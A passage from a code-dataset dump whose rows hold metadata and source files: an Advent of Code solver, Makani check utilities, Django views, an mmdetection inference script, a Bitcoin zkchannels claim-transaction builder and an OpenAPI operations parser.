main() | 43.015873 | 254 | 0.632103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,450 | 0.267528 |
d3969f3939b66414fab78446df9b5e37a00ed217 | 1,097 | py | Python | Day1/solution.py | pbragapassarelli/Advent-of-Code-2020 | 6524449c0832e87aa6a94e67162378d315ec2386 | [
"MIT"
] | null | null | null | Day1/solution.py | pbragapassarelli/Advent-of-Code-2020 | 6524449c0832e87aa6a94e67162378d315ec2386 | [
"MIT"
] | null | null | null | Day1/solution.py | pbragapassarelli/Advent-of-Code-2020 | 6524449c0832e87aa6a94e67162378d315ec2386 | [
"MIT"
] | null | null | null | import numpy as np
data_file = 'input.txt'
def parse_input(input_data_file):
with open(input_data_file, 'r') as input_data_file:
input_data = input_data_file.read()
lines = input_data.split('\n')
item_count = len(lines) - 1
items = []
for i in range(0, item_count):
line = lines[i]
items.append(int(line))
return items
def solver1(items):
for i in items:
for j in items:
if i + j == 2020:
break
if i + j == 2020:
break
return i*j
def solver2(items):
for i in items:
for j in items:
for k in items:
if i + j + k == 2020:
break
if i + j + k == 2020:
break
if i + j + k == 2020:
break
return i*j*k
items = parse_input(data_file)
solution1 = solver1(items)
solution2 = solver2(items)
print(f'The 2 items that sum to 2020 multiplied together is equal to {solution1}.')
print(f'The 3 items that sum to 2020 multiplied together is equal to {solution2}.') | 21.94 | 83 | 0.548769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 170 | 0.154968 |
d3970e3b64f228131e6989e131e2293b5c3f4cea | 2,206 | py | Python | analysis/log_analysis/check_util.py | leozz37/makani | c94d5c2b600b98002f932e80a313a06b9285cc1b | [
"Apache-2.0"
] | 1,178 | 2020-09-10T17:15:42.000Z | 2022-03-31T14:59:35.000Z | analysis/log_analysis/check_util.py | leozz37/makani | c94d5c2b600b98002f932e80a313a06b9285cc1b | [
"Apache-2.0"
] | 1 | 2020-05-22T05:22:35.000Z | 2020-05-22T05:22:35.000Z | analysis/log_analysis/check_util.py | leozz37/makani | c94d5c2b600b98002f932e80a313a06b9285cc1b | [
"Apache-2.0"
] | 107 | 2020-09-10T17:29:30.000Z | 2022-03-18T09:00:14.000Z | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for checks."""
from makani.analysis.checks import base_check
from makani.lib.python import import_util
# TODO: Move this to //analysis/checks/base_check.py
def LoadListOfChecks(path_to_checks):
"""Load the ListOfChecks object given the path to its file and class.
Args:
path_to_checks: A string specifying the location of the checks.
E.g. makani.analysis.my_checks.MyCheck.
Returns:
The ListOfChecks object.
"""
cls = import_util.ImportClass(path_to_checks)
return cls(for_log=True)
def LoadJsonCheck(path_to_check, parameters_json):
r"""Load the Check object given the path to its classpath and parameters.
Args:
path_to_check: A string specifying the location of the checks.
E.g. makani.analysis.my_checks.MyCheck
parameters_json: A JSON serialized string of the parameters needed to
instantiate the class.
E.g. "{\"for_log\": true, \"warning_ranges\": {\"ranges\": [0, 180]},
\"normal_ranges\": {\"ranges\": [80, 150]}}"
Returns:
The Check object.
"""
cls = import_util.ImportClass(path_to_check)
parameters = base_check.ParseCheckSpecs(parameters_json)
return cls(**parameters)
def LoadCheck(path_to_check, params):
"""Load the ListOfChecks object given the path to its file and class.
Args:
path_to_check: A string specifying the location of the checks.
E.g. makani.analysis.my_checks.MyCheck.
params: A string specifying parameters to be passed into the check.
Returns:
The CheckItem object.
"""
cls = import_util.ImportClass(path_to_check)
return cls(**params)
| 32.441176 | 77 | 0.729828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,681 | 0.762013 |
d3979bc7f150cc1b30133b1b6f53958cab7914a1 | 1,732 | py | Python | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | resource/views.py | madre/PersonalWeb | 27d88a3c6c4f86028887b0455b60eceeeb663e25 | [
"Apache-2.0"
] | null | null | null | #coding=utf-8
"""
__create_time__ = '13-10-18'
__author__ = 'Madre'
"""
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
from resource.models import Resource, Topic
class ResourceListView(ListView):
context_object_name = 'resource_list'
template_name = "resource_list.html"
model = Resource
def get_context_data(self, **kwargs):
context = super(ResourceListView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context
class ResourceDetailView(DetailView):
context_object_name = 'resource'
model = Resource
template_name = "resource_detail.html"
def get_object(self):
resource = get_object_or_404(Resource, pk=self.kwargs['pk'])
return resource
def get_context_data(self, **kwargs):
context = super(ResourceDetailView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context
class DocsResourceView(ListView):
context_object_name = 'resource_list'
template_name = "resource_docs.html"
model = Resource
def get_queryset(self):
return Resource.objects.filter(resource_type__slug="docs")
class TopicDetailView(DetailView):
context_object_name = 'topic'
model = Topic
template_name = "topic_detail.html"
def get_object(self):
topic = get_object_or_404(Topic, pk=self.kwargs['pk'])
return topic
def get_context_data(self, **kwargs):
context = super(TopicDetailView, self).get_context_data(**kwargs)
context["topic_list"] = Topic.objects.all()
return context | 29.355932 | 77 | 0.680139 | 1,483 | 0.856236 | 0 | 0 | 0 | 0 | 0 | 0 | 252 | 0.145497 |
d397b6b538c4e3913d34403efb0770025b618578 | 1,560 | py | Python | tools/dota/dota_image.py | liuyanyi/mmdetection | d2003536af6f08cb9bd7a75e0444eef03ace4bb3 | [
"Apache-2.0"
] | null | null | null | tools/dota/dota_image.py | liuyanyi/mmdetection | d2003536af6f08cb9bd7a75e0444eef03ace4bb3 | [
"Apache-2.0"
] | null | null | null | tools/dota/dota_image.py | liuyanyi/mmdetection | d2003536af6f08cb9bd7a75e0444eef03ace4bb3 | [
"Apache-2.0"
] | null | null | null | import os
from argparse import ArgumentParser
from mmdet.apis import (inference_detector,
init_detector)
def parse_args():
parser = ArgumentParser()
parser.add_argument('img_dir', help='Image file folder')
parser.add_argument('out_dir', help='Image file output folder')
parser.add_argument('config', help='Config file')
parser.add_argument('checkpoint', help='Checkpoint file')
parser.add_argument(
'--device', default='cuda:0', help='Device used for inference')
parser.add_argument(
'--score-thr', type=float, default=0.3, help='bbox score threshold')
args = parser.parse_args()
return args
def main(args):
# build the model from a config file and a checkpoint file
model = init_detector(args.config, args.checkpoint, device=args.device)
files = os.listdir(args.img_dir) # 得到文件夹下的所有文件名称
for file in files: # 遍历文件夹
if not os.path.isdir(file): # 判断是否是文件夹,不是文件夹才打开
file_path = os.path.join(args.img_dir, file)
# test a single image
result = inference_detector(model, file_path)
# show the results
model.show_result(
file_path,
result,
score_thr=args.score_thr,
show=False,
wait_time=0,
bbox_color=(72, 101, 241),
text_color=(72, 101, 241),
out_file=os.path.join(args.out_dir, file)
)
if __name__ == '__main__':
args = parse_args()
main(args)
| 31.836735 | 76 | 0.608974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 411 | 0.252147 |
d39a467396d68d59b013218c77d34986d2e3fa03 | 6,698 | py | Python | tx/tx_builder/bitcoin/cust_claim.py | fakecoinbase/boltlabs-incslashlibzkchannels | c0b43790c637f4ffd2956193b16f9ddcea94a3a4 | [
"MIT"
] | 68 | 2020-01-18T22:07:57.000Z | 2022-02-03T02:30:55.000Z | tx/tx_builder/bitcoin/cust_claim.py | fakecoinbase/boltlabs-incslashlibzkchannels | c0b43790c637f4ffd2956193b16f9ddcea94a3a4 | [
"MIT"
] | 2 | 2020-04-29T02:02:49.000Z | 2021-04-08T11:23:48.000Z | tx/tx_builder/bitcoin/cust_claim.py | fakecoinbase/boltlabs-incslashlibzkchannels | c0b43790c637f4ffd2956193b16f9ddcea94a3a4 | [
"MIT"
] | 3 | 2021-04-04T05:04:16.000Z | 2022-01-26T10:14:46.000Z | # p2wsh input (2-of-2 multisig)
# p2wpkh output
import argparse
import hashlib
import ecdsa
def dSHA256(data):
hash_1 = hashlib.sha256(data).digest()
hash_2 = hashlib.sha256(hash_1).digest()
return hash_2
def hash160(s):
'''sha256 followed by ripemd160'''
return hashlib.new('ripemd160', hashlib.sha256(s).digest()).digest()
def privkey_to_pubkey(privkey):
signing_key = ecdsa.SigningKey.from_string(privkey, curve=ecdsa.SECP256k1) # Don't forget to specify the curve
verifying_key = signing_key.get_verifying_key()
# Use this code block if the address you gave corresponds to the compressed public key
x_cor = bytes.fromhex(verifying_key.to_string().hex())[:32] # The first 32 bytes are the x coordinate
y_cor = bytes.fromhex(verifying_key.to_string().hex())[32:] # The last 32 bytes are the y coordinate
if int.from_bytes(y_cor, byteorder="big", signed=True) % 2 == 0: # We need to turn the y_cor into a number.
public_key = bytes.fromhex("02" + x_cor.hex())
else:
public_key = bytes.fromhex("03" + x_cor.hex())
return public_key
################################
parser = argparse.ArgumentParser()
parser.add_argument("--cust_close_privkey", "-ccpk", help="public key of cust close to-self output")
parser.add_argument("--output_pubkey", "-cpk", help="pubkey of output for the cust")
parser.add_argument("--merch_disp_pubkey", "-mdpk", help="public key of merchant dispute")
parser.add_argument("--revocation_lock", "-rl", help="revocation lock (hash160{revocation_secret})")
parser.add_argument("--to_self_delay", "-tsd", help="to_self_delay (in unit of blocks) for the merchant's to-self output")
parser.add_argument("--txid", "-tx", help="txid of outpoint as hex string")
parser.add_argument("--index", "-ind", help="index of outpoint")
parser.add_argument("--amount_btc", "-a", help="amount of btc in")
parser.add_argument("--output_btc", "-mo", help="btc to merchant close output")
args = parser.parse_args()
################################
# version is 4-bytes little endian. Version 2 should be default
version = bytes.fromhex("0200 0000")
marker = bytes.fromhex("00") # this must be 00
flag = bytes.fromhex("01") # this must be 01
# txID_str = "f4df16149735c2963832ccaa9627f4008a06291e8b932c2fc76b3a5d62d462e1"
# tx_index = 0 # index starts at 0
txID_str = args.txid
txid = (bytes.fromhex(txID_str))[::-1]
tx_index = int(args.index)
index = tx_index.to_bytes(4, byteorder="little", signed=False)
txid = (bytes.fromhex(txID_str))[::-1]
index = tx_index.to_bytes(4, byteorder="little", signed=False)
nSequence_as_blocks = int(args.to_self_delay, 16)
sequence = nSequence_as_blocks.to_bytes(4, byteorder="little", signed=False)
# todo: find a nicer way to do this
l = int(len(args.to_self_delay)/2)
short_sequence = nSequence_as_blocks.to_bytes(l, byteorder="little", signed=False)
input_amount_sat = int(float(args.amount_btc) * 100000000)
output_value_sat = int(float(args.output_btc) * 100000000)
input_amount = input_amount_sat.to_bytes(8, byteorder="little", signed=True)
output_value = output_value_sat.to_bytes(8, byteorder="little", signed=True)
cust_close_privkey_hex = args.cust_close_privkey
cust_close_privkey = bytes.fromhex(cust_close_privkey_hex)
cust_close_pubkey = privkey_to_pubkey(cust_close_privkey)
merch_disp_pubkey = bytes.fromhex(args.merch_disp_pubkey)
revocation_lock = bytes.fromhex(args.revocation_lock)
# P2WSH cust-close scriptPubKey
# 0x63 OP_IF
# 0xa9 OP_HASH160
# 0x14 OP_DATA - len(revocation_lock {hash160[revocation-secret]})
# revocation_lock
# 0x88 OP_EQUALVERIFY
# 0x21 OP_DATA - len(merch_disp_pubkey)
# merch_disp_pubkey
# 0x67 OP_ELSE
# 0x__ OP_DATA - len(to_self_delay) (probably ~0x02)
# to_self_delay
# 0xb2 OP_CHECKSEQUENCEVERIFY
# 0x75 OP_DROP
# 0x21 OP_DATA - len(cust_close_pubkey)
# cust_close_pk
# 0x68 OP_ENDIF
# 0xac OP_CHECKSIG
nSequence_as_blocks = int(args.to_self_delay, 16)
# todo: find a nicer way to do this
l = int(len(args.to_self_delay)/2)
short_sequence = nSequence_as_blocks.to_bytes(l, byteorder="little", signed=False)
cust_close_script = (
bytes.fromhex("63 a8 20")
+ revocation_lock
+ bytes.fromhex("88 21")
+ merch_disp_pubkey
+ bytes.fromhex("67")
+ (len(short_sequence)).to_bytes(1, byteorder="little", signed=False)
+ short_sequence
+ bytes.fromhex("b2 75 21")
+ cust_close_pubkey
+ bytes.fromhex("68 ac")
)
# send output to another P2WPKH address
output_pubkey = bytes.fromhex(args.output_pubkey)
output_scriptPK = bytes.fromhex("0014") + hash160(output_pubkey)
locktime = bytes.fromhex("00000000")
sighash = bytes.fromhex("01000000")
sighash_type_flag = bytes.fromhex("01")
tx_in_count = bytes.fromhex("01")
tx_out_count = bytes.fromhex("01")
##########################################
# hashPrevOuts and outpoint
outpoint = (
txid
+ index
)
hashPrevOuts = dSHA256(outpoint)
# hashSequence
hashSequence = dSHA256(sequence)
# hashOutputs and output
output = (
output_value
+ (len(output_scriptPK)).to_bytes(1, byteorder="little", signed=False)
+ output_scriptPK
)
hashOutputs = dSHA256(output)
scriptcode = (
(len(cust_close_script)).to_bytes(1, byteorder="little", signed=False)
+ cust_close_script
)
# serialized bip_143 object
bip_143 = (
version
+ hashPrevOuts
+ hashSequence
+ outpoint
+ scriptcode
+ input_amount
+ sequence
+ hashOutputs
+ locktime
+ sighash
)
hashed_bip_143 = dSHA256(bip_143)
signing_key_cust_close = ecdsa.SigningKey.from_string(cust_close_privkey, curve=ecdsa.SECP256k1) # Don't forget to specify the curve
signature_cust_close = signing_key_cust_close.sign_digest(hashed_bip_143, sigencode=ecdsa.util.sigencode_der_canonize)
witness = (
# indicate the number of stack items for the txin
bytes.fromhex("03")
# signature
+ (len(signature_cust_close)+1).to_bytes(1, byteorder="little", signed=False)
+ signature_cust_close
+ sighash_type_flag
# So that we enter OP_ELSE in the script
+ bytes.fromhex("00")
# witnessScript
# This is the script that the creator of this transaction needs to provide, and
# solve, in order to redeem the UTXO listed in the input
+ (len(cust_close_script)).to_bytes(1, byteorder="little", signed=False)
+ cust_close_script
)
scriptSig = (
bytes.fromhex("00") # length of empty scriptSig
)
final_tx = (
version
+ marker
+ flag
+ tx_in_count
+ outpoint
+ scriptSig
+ sequence
+ tx_out_count
+ output
+ witness
+ locktime
)
print(final_tx.hex())
# print(merch_close_script.hex())
| 30.584475 | 132 | 0.711854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,418 | 0.361003 |
d39a71a428e5735148b326afbfd3b4fdc0fd033f | 852 | py | Python | api/api/model/ApiOperations.py | pampi9/api-handler | 899926baae6a12613bfc5faac1ecd0c223ec3226 | [
"Apache-2.0"
] | null | null | null | api/api/model/ApiOperations.py | pampi9/api-handler | 899926baae6a12613bfc5faac1ecd0c223ec3226 | [
"Apache-2.0"
] | null | null | null | api/api/model/ApiOperations.py | pampi9/api-handler | 899926baae6a12613bfc5faac1ecd0c223ec3226 | [
"Apache-2.0"
] | null | null | null | class ApiOperations:
"""
Class to extract defined parts from the OpenApiSpecs definition json
"""
def __init__(self, resource, parts=None):
"""
Extract defined parts out of paths/<endpoint> (resource) in the OpenApiSpecs definition
:param resource: source to be extracted from
:param parts: single bloc names to be extracted
"""
if parts is None:
parts = ["parameters", "responses", "requestBody"]
self.operations = {}
default_operation = {}
for part in parts:
default_operation[part] = None
for (method, details) in resource.items():
self.operations[method] = default_operation.copy()
for part in parts:
if part in details:
self.operations[method][part] = details[part]
| 37.043478 | 95 | 0.597418 | 851 | 0.998826 | 0 | 0 | 0 | 0 | 0 | 0 | 340 | 0.399061 |